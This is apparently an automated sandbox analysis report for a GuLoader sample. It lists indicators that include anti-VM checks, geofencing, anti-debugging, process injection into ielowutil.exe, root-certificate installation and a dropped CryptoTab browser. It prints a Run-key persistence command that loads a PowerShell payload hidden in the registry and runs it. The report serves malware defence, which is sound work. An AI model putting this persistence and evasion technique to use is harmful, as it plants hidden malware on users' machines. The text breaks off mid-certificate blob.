guloader | e9bc9118078c9b521c97543e9b0a13d63c8d09f5289a9892efc40cb64a37cc91

Modify Registry

Processes:

setup.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{7D2B3E1D-D096-4594-9D8F-A6667F12E0AC}\ = "CryptoTab Browser"	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{7D2B3E1D-D096-4594-9D8F-A6667F12E0AC}\StubPath = "\"C:\\Program Files\\CryptoTab Browser\\Application\\108.0.5359.95\\Installer\\chrmstp.exe\" --configure-user-settings --verbose-logging --system-level"	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{7D2B3E1D-D096-4594-9D8F-A6667F12E0AC}\Localized Name = "CryptoTab Browser"	setup.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{7D2B3E1D-D096-4594-9D8F-A6667F12E0AC}\IsInstalled = "1"	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{7D2B3E1D-D096-4594-9D8F-A6667F12E0AC}\Version = "43,0,0,0"	setup.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components	setup.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components\{7D2B3E1D-D096-4594-9D8F-A6667F12E0AC}	setup.exe

Checks QEMU agent file 2 TTPs 2 IoCs

Checks presence of QEMU agent, possibly to detect virtualization.

Query Registry

System Information Discovery

Processes:

powershell.exeielowutil.exe

description	ioc	process
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	powershell.exe
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	ielowutil.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

Processes:

WScript.exebrowser.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	browser.exe

Executes dropped EXE 12 IoCs

Processes:

file.exectu542B.tmpsetup.exesetup.exesetup.exesetup.exebrowser.exebrowser.exebrowser.exeCryptoTabUpdater.exebrowser.exebrowser.exe

pid	process
4836	file.exe
4524	ctu542B.tmp
1748	setup.exe
1416	setup.exe
4252	setup.exe
2644	setup.exe
3252	browser.exe
3732	browser.exe
1228	browser.exe
1556	CryptoTabUpdater.exe
4712	browser.exe
2416	browser.exe

Loads dropped DLL 7 IoCs

Processes:

browser.exebrowser.exebrowser.exebrowser.exebrowser.exe

pid process

3252 browser.exe
3732 browser.exe
1228 browser.exe
3252 browser.exe
4712 browser.exe
4712 browser.exe
2416 browser.exe

pid	process
3252	browser.exe
3732	browser.exe
1228	browser.exe
3252	browser.exe
4712	browser.exe
4712	browser.exe
2416	browser.exe

Registers COM server for autorun 1 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

Processes:

setup.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\Software\Classes\CLSID\{635EFA6F-08D6-4EC9-BD14-8A0FDE975159}\LocalServer32	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{635EFA6F-08D6-4EC9-BD14-8A0FDE975159}\LocalServer32\ = "\"C:\\Program Files\\CryptoTab Browser\\Application\\108.0.5359.95\\notification_helper.exe\""	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{635EFA6F-08D6-4EC9-BD14-8A0FDE975159}\LocalServer32\ServerExecutable = "C:\\Program Files\\CryptoTab Browser\\Application\\108.0.5359.95\\notification_helper.exe"	setup.exe

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\file.exe	upx
behavioral2/memory/4836-161-0x0000000000960000-0x00000000012E7000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\file.exe	upx
behavioral2/memory/4836-174-0x0000000000960000-0x00000000012E7000-memory.dmp	upx

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

Modify Registry

Processes:

ielowutil.exesetup.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Misti = "%TORO% -w 1 $Semi194=(Get-ItemProperty -Path 'HKCU:\\Spiritu\\').Shatterw;%TORO% ($Semi194)"	ielowutil.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\CryptoTab Browser = "C:\\Program Files\\CryptoTab Browser\\Application\\browser.exe"	setup.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Windows\CurrentVersion\Run	ielowutil.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

Processes:

ielowutil.exe

pid process

3604 ielowutil.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exeielowutil.exe

pid process

5020 powershell.exe
3604 ielowutil.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 5020 set thread context of 3604 5020 powershell.exe ielowutil.exe

pid	process
3604	ielowutil.exe

description	pid	process	target process
PID 5020 set thread context of 3604	5020	powershell.exe	ielowutil.exe

Drops file in Program Files directory 64 IoCs

Processes:

setup.exebrowser.exesetup.exe

description	ioc	process
File created	C:\Program Files\CryptoTab Browser\Temp\source1748_256955887\Chrome-bin\108.0.5359.95\chrome_wer.dll	setup.exe
File created	C:\Program Files\CryptoTab Browser\Temp\source1748_256955887\Chrome-bin\108.0.5359.95\Locales\lv.pak	setup.exe
File created	C:\Program Files\CryptoTab Browser\Temp\source1748_256955887\Chrome-bin\108.0.5359.95\Locales\vi.pak	setup.exe
File created	C:\Program Files\CryptoTab Browser\Application\browser.exe	setup.exe
File created	C:\Program Files\CryptoTab Browser\Temp\source1748_256955887\Chrome-bin\108.0.5359.95\Locales\da.pak	setup.exe
File created	C:\Program Files\CryptoTab Browser\Temp\source1748_256955887\Chrome-bin\108.0.5359.95\Locales\fa.pak	setup.exe
File created	C:\Program Files\CryptoTab Browser\Temp\source1748_256955887\Chrome-bin\108.0.5359.95\Locales\he.pak	setup.exe
File created	C:\Program Files\CryptoTab Browser\Temp\source1748_256955887\Chrome-bin\108.0.5359.95\Locales\pl.pak	setup.exe
File created	C:\Program Files\CryptoTab Browser\Temp\source1748_256955887\Chrome-bin\108.0.5359.95\Locales\sv.pak	setup.exe
File created	C:\Program Files\CryptoTab Browser\Temp\source1748_256955887\Chrome-bin\108.0.5359.95\VisualElements\SmallLogo.png	setup.exe
File created	C:\Program Files\CryptoTab Browser\Application\chrome_proxy.exe	setup.exe
File opened for modification	C:\Program Files\CryptoTab Browser\Application\SetupMetrics\20230220001428.pma	setup.exe
File created	C:\Program Files\CryptoTab Browser\Temp\source1748_256955887\Chrome-bin\108.0.5359.95\libEGL.dll	setup.exe
File created	C:\Program Files\CryptoTab Browser\Temp\source1748_256955887\Chrome-bin\108.0.5359.95\Locales\mr.pak	setup.exe
File created	C:\Program Files\CryptoTab Browser\Temp\source1748_256955887\Chrome-bin\108.0.5359.95\108.0.5359.95.manifest	setup.exe
File created	C:\Program Files\CryptoTab Browser\Temp\source1748_256955887\Chrome-bin\108.0.5359.95\chrome.dll	setup.exe
File created	C:\Program Files\CryptoTab Browser\Temp\source1748_256955887\Chrome-bin\108.0.5359.95\Locales\th.pak	setup.exe
File created	C:\Program Files\CryptoTab Browser\Temp\source1748_256955887\Chrome-bin\108.0.5359.95\Locales\zh-CN.pak	setup.exe
File created	C:\Program Files\CryptoTab Browser\Temp\source1748_256955887\Chrome-bin\108.0.5359.95\notification_helper.exe	setup.exe
File created	C:\Program Files\CryptoTab Browser\Temp\source1748_256955887\Chrome-bin\108.0.5359.95\VisualElements\Logo.png	setup.exe
File created	C:\Program Files\CryptoTab Browser\Temp\source1748_256955887\Chrome-bin\chrome.VisualElementsManifest.xml	setup.exe
File created	C:\Program Files\CryptoTab Browser\Temp\source1748_256955887\Chrome-bin\108.0.5359.95\icudtl.dat	setup.exe
File created	C:\Program Files\CryptoTab Browser\Temp\source1748_256955887\Chrome-bin\108.0.5359.95\Locales\ar.pak	setup.exe
File created	C:\Program Files\CryptoTab Browser\Temp\source1748_256955887\Chrome-bin\108.0.5359.95\Locales\fr.pak	setup.exe
File created	C:\Program Files\CryptoTab Browser\Temp\source1748_256955887\Chrome-bin\108.0.5359.95\Locales\hr.pak	setup.exe
File created	C:\Program Files\CryptoTab Browser\Temp\source1748_256955887\Chrome-bin\108.0.5359.95\Locales\ml.pak	setup.exe
File created	C:\Program Files\CryptoTab Browser\Temp\source1748_256955887\Chrome-bin\108.0.5359.95\Locales\sl.pak	setup.exe
File created	C:\Program Files\CryptoTab Browser\Temp\source1748_256955887\Chrome-bin\108.0.5359.95\MEIPreload\manifest.json	setup.exe
File created	C:\Program Files\CryptoTab Browser\Temp\source1748_256955887\Chrome-bin\108.0.5359.95\chrome_200_percent.pak	setup.exe
File created	C:\Program Files\CryptoTab Browser\Temp\source1748_256955887\Chrome-bin\108.0.5359.95\Locales\id.pak	setup.exe
File created	C:\Program Files\CryptoTab Browser\Temp\source1748_256955887\Chrome-bin\108.0.5359.95\Locales\nl.pak	setup.exe
File created	C:\Program Files\CryptoTab Browser\Temp\source1748_256955887\Chrome-bin\108.0.5359.95\Locales\sk.pak	setup.exe
File created	C:\Program Files\CryptoTab Browser\Temp\source1748_256955887\Chrome-bin\108.0.5359.95\Locales\ta.pak	setup.exe
File created	C:\Program Files\CryptoTab Browser\Temp\source1748_256955887\Chrome-bin\108.0.5359.95\Locales\te.pak	setup.exe
File created	C:\Program Files\CryptoTab Browser\Temp\source1748_256955887\Chrome-bin\108.0.5359.95\v8_context_snapshot.bin	setup.exe
File created	C:\Program Files\CryptoTab Browser\Temp\source1748_256955887\Chrome-bin\chrome_proxy.exe	setup.exe
File opened for modification	C:\Program Files\CryptoTab Browser\Application\debug.log	browser.exe
File created	C:\Program Files\CryptoTab Browser\Temp\source1748_256955887\chrome.7z	setup.exe
File created	C:\Program Files\CryptoTab Browser\Temp\source1748_256955887\Chrome-bin\108.0.5359.95\Locales\de.pak	setup.exe
File created	C:\Program Files\CryptoTab Browser\Temp\source1748_256955887\Chrome-bin\108.0.5359.95\Locales\es-419.pak	setup.exe
File created	C:\Program Files\CryptoTab Browser\Temp\source1748_256955887\Chrome-bin\108.0.5359.95\Locales\gu.pak	setup.exe
File created	C:\Program Files\CryptoTab Browser\Temp\source1748_256955887\Chrome-bin\108.0.5359.95\mojo_core.dll	setup.exe
File created	C:\Program Files\CryptoTab Browser\Temp\source1748_256955887\Chrome-bin\108.0.5359.95\vulkan-1.dll	setup.exe
File created	C:\Program Files\CryptoTab Browser\Application\SetupMetrics\a9fb3896-350c-4865-9cc3-f392b4a5e8ff.tmp	setup.exe
File created	C:\Program Files\CryptoTab Browser\Temp\source1748_256955887\Chrome-bin\108.0.5359.95\Locales\hi.pak	setup.exe
File created	C:\Program Files\CryptoTab Browser\Temp\source1748_256955887\Chrome-bin\108.0.5359.95\Locales\ru.pak	setup.exe
File created	C:\Program Files\CryptoTab Browser\Temp\source1748_256955887\Chrome-bin\108.0.5359.95\Locales\sr.pak	setup.exe
File created	C:\Program Files\CryptoTab Browser\Temp\source1748_256955887\Chrome-bin\108.0.5359.95\vk_swiftshader.dll	setup.exe
File opened for modification	C:\Program Files\CryptoTab Browser\Application\browser.exe	setup.exe
File created	C:\Program Files\CryptoTab Browser\Temp\source1748_256955887\Chrome-bin\108.0.5359.95\chrome_pwa_launcher.exe	setup.exe
File created	C:\Program Files\CryptoTab Browser\Temp\source1748_256955887\Chrome-bin\108.0.5359.95\d3dcompiler_47.dll	setup.exe
File created	C:\Program Files\CryptoTab Browser\Temp\source1748_256955887\Chrome-bin\108.0.5359.95\Locales\af.pak	setup.exe
File created	C:\Program Files\CryptoTab Browser\Temp\source1748_256955887\Chrome-bin\108.0.5359.95\Locales\ca.pak	setup.exe
File created	C:\Program Files\CryptoTab Browser\Temp\source1748_256955887\Chrome-bin\108.0.5359.95\Locales\hu.pak	setup.exe
File created	C:\Program Files\CryptoTab Browser\Temp\source1748_256955887\Chrome-bin\108.0.5359.95\Locales\kn.pak	setup.exe
File created	C:\Program Files\CryptoTab Browser\Temp\source1748_256955887\Chrome-bin\108.0.5359.95\Locales\bn.pak	setup.exe
File created	C:\Program Files\CryptoTab Browser\Temp\source1748_256955887\Chrome-bin\108.0.5359.95\Locales\es.pak	setup.exe
File created	C:\Program Files\CryptoTab Browser\Temp\source1748_256955887\Chrome-bin\108.0.5359.95\Locales\it.pak	setup.exe
File created	C:\Program Files\CryptoTab Browser\Temp\source1748_256955887\Chrome-bin\108.0.5359.95\Locales\ro.pak	setup.exe
File created	C:\Program Files\CryptoTab Browser\Temp\source1748_256955887\Chrome-bin\108.0.5359.95\Locales\tr.pak	setup.exe
File created	C:\Program Files\CryptoTab Browser\Temp\source1748_256955887\Chrome-bin\108.0.5359.95\Locales\zh-TW.pak	setup.exe
File created	C:\Program Files\CryptoTab Browser\Application\108.0.5359.95\Installer\chrmstp.exe	setup.exe
File created	C:\Program Files\CryptoTab Browser\Temp\source1748_256955887\Chrome-bin\108.0.5359.95\chrome_elf.dll	setup.exe
File created	C:\Program Files\CryptoTab Browser\Temp\source1748_256955887\Chrome-bin\108.0.5359.95\eventlog_provider.dll	setup.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

System Information Discovery

Processes:

browser.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	browser.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	browser.exe

Modifies registry class 64 IoCs

Processes:

CryptoTabUpdater.exesetup.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{79BB07C6-6A3D-4F93-ADB6-841FA449207F}\ProxyStubClsid32	CryptoTabUpdater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\CLSID\{D133B120-6DB4-4D6B-8BFE-83BF8CA1B1B0}	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\cryptotab\DefaultIcon\ = "\""	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithProgIds\ChromiumHTM	setup.exe
Key created	\REGISTRY\MACHINE\Software\Classes\.html\OpenWithProgids	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.xhtml\OpenWithProgIds\ChromiumHTM	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{79BB07C6-6A3D-4F93-ADB6-841FA449207F}\TypeLib\Version = "1.0"	CryptoTabUpdater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\ChromiumHTM\shell\open\command	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.svg\OpenWithProgIds\ChromiumHTM	setup.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Interface	setup.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Interface\{B88C45B9-8825-4629-B83E-77CC67D9CEED}\ProxyStubClsid32	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{B88C45B9-8825-4629-B83E-77CC67D9CEED}\TypeLib\Version = "1.0"	setup.exe
Key created	\REGISTRY\MACHINE\Software\Classes\TypeLib\{B88C45B9-8825-4629-B83E-77CC67D9CEED}\1.0\0\win32	setup.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\cryptotab\shell\open\command	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\cryptotab\URL Protocol	setup.exe
Key created	\REGISTRY\MACHINE\Software\Classes\.xhtml\OpenWithProgids	setup.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{5E3DE9E9-0248-4FAB-AC1C-01B86CF9790E}	CryptoTabUpdater.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{79BB07C6-6A3D-4F93-ADB6-841FA449207F}\ProxyStubClsid32	CryptoTabUpdater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{5E6F2834-1FAD-4CCD-BD5E-3510C46A91E7}\ = "CryptoTab Browser Updater"	CryptoTabUpdater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\CLSID\{635EFA6F-08D6-4EC9-BD14-8A0FDE975159}	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\ChromiumHTM\Application\AppUserModelId = "CryptoTab Browser"	setup.exe
Key created	\REGISTRY\MACHINE\Software\Classes\.html	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{79BB07C6-6A3D-4F93-ADB6-841FA449207F}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	CryptoTabUpdater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{5E3DE9E9-0248-4FAB-AC1C-01B86CF9790E}\1.0\0\win32\ = "C:\\Program Files\\CryptoTab Browser\\Application\\CryptoTabUpdater.exe"	CryptoTabUpdater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{5E3DE9E9-0248-4FAB-AC1C-01B86CF9790E}\1.0\HELPDIR\ = "C:\\Program Files\\CryptoTab Browser\\Application"	CryptoTabUpdater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{635EFA6F-08D6-4EC9-BD14-8A0FDE975159}\LocalServer32\ServerExecutable = "C:\\Program Files\\CryptoTab Browser\\Application\\108.0.5359.95\\notification_helper.exe"	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{B88C45B9-8825-4629-B83E-77CC67D9CEED}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\cryptotab\ = "URL:cryptotab Protocol"	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\ChromiumHTM\ = "Chromium HTML Document"	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.pdf\OpenWithProgids\ChromiumHTM	setup.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{5E3DE9E9-0248-4FAB-AC1C-01B86CF9790E}\1.0\0\win32	CryptoTabUpdater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{B88C45B9-8825-4629-B83E-77CC67D9CEED}\TypeLib\ = "{B88C45B9-8825-4629-B83E-77CC67D9CEED}"	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\ChromiumHTM\DefaultIcon\ = "C:\\Program Files\\CryptoTab Browser\\Application\\browser.exe,0"	setup.exe
Key created	\REGISTRY\MACHINE\Software\Classes\.xhtml	setup.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{5E3DE9E9-0248-4FAB-AC1C-01B86CF9790E}\1.0	CryptoTabUpdater.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{5E3DE9E9-0248-4FAB-AC1C-01B86CF9790E}\1.0\HELPDIR	CryptoTabUpdater.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{79BB07C6-6A3D-4F93-ADB6-841FA449207F}\TypeLib	CryptoTabUpdater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Interface\{B88C45B9-8825-4629-B83E-77CC67D9CEED}\TypeLib	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{B88C45B9-8825-4629-B83E-77CC67D9CEED}\1.0\0\win64\ = "C:\\Program Files\\CryptoTab Browser\\Application\\108.0.5359.95\\elevation_service.exe"	setup.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\cryptotab\shell\open	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.html\OpenWithProgIds\ChromiumHTM	setup.exe
Key created	\REGISTRY\MACHINE\Software\Classes\.pdf	setup.exe
Key created	\REGISTRY\MACHINE\Software\Classes\.svg\OpenWithProgids	setup.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{5E3DE9E9-0248-4FAB-AC1C-01B86CF9790E}\1.0\0	CryptoTabUpdater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{79BB07C6-6A3D-4F93-ADB6-841FA449207F}\TypeLib\Version = "1.0"	CryptoTabUpdater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{635EFA6F-08D6-4EC9-BD14-8A0FDE975159}\LocalServer32\ = "\"C:\\Program Files\\CryptoTab Browser\\Application\\108.0.5359.95\\notification_helper.exe\""	setup.exe
Key created	\REGISTRY\MACHINE\Software\Classes\AppID	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\AppID\{D133B120-6DB4-4D6B-8BFE-83BF8CA1B1B0}\LocalService = "CryptoTabBrowserElevationService"	setup.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\cryptotab\shell	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\ChromiumHTM\Application\ApplicationName = "CryptoTab Browser"	setup.exe
Key created	\REGISTRY\MACHINE\Software\Classes\.webp\OpenWithProgids	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{5E3DE9E9-0248-4FAB-AC1C-01B86CF9790E}\1.0\ = "CryptoTab Browser Updater 1.0 Type Library"	CryptoTabUpdater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{D133B120-6DB4-4D6B-8BFE-83BF8CA1B1B0}\AppID = "{D133B120-6DB4-4D6B-8BFE-83BF8CA1B1B0}"	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\cryptotab\shell\open\command\ = "\"C:\\Program Files\\CryptoTab Browser\\Application\\browser.exe\" \"%1\""	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\ChromiumHTM\AppUserModelId = "CryptoTab Browser"	setup.exe
Key created	\REGISTRY\MACHINE\Software\Classes\.htm	setup.exe
Key created	\REGISTRY\MACHINE\Software\Classes\.htm\OpenWithProgids	setup.exe
Key created	\REGISTRY\MACHINE\Software\Classes\.shtml	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{79BB07C6-6A3D-4F93-ADB6-841FA449207F}\ = "IProcessLauncher"	CryptoTabUpdater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\AppID\{D133B120-6DB4-4D6B-8BFE-83BF8CA1B1B0}	setup.exe
Key created	\REGISTRY\MACHINE\Software\Classes\TypeLib\{B88C45B9-8825-4629-B83E-77CC67D9CEED}\1.0\0	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{B88C45B9-8825-4629-B83E-77CC67D9CEED}\1.0\0\win32\ = "C:\\Program Files\\CryptoTab Browser\\Application\\108.0.5359.95\\elevation_service.exe"	setup.exe
Key created	\REGISTRY\MACHINE\Software\Classes\TypeLib\{B88C45B9-8825-4629-B83E-77CC67D9CEED}\1.0\0\win64	setup.exe
Key created	\REGISTRY\MACHINE\Software\Classes\ChromiumHTM	setup.exe

Modifies system certificate store 2 TTPs 5 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

Processes:

file.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000007431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	file.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 5c000000010000000400000000080000190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc36200000001000000200000007431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8040000000100000010000000d474de575c39b2d39c8583c5c065498a2000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23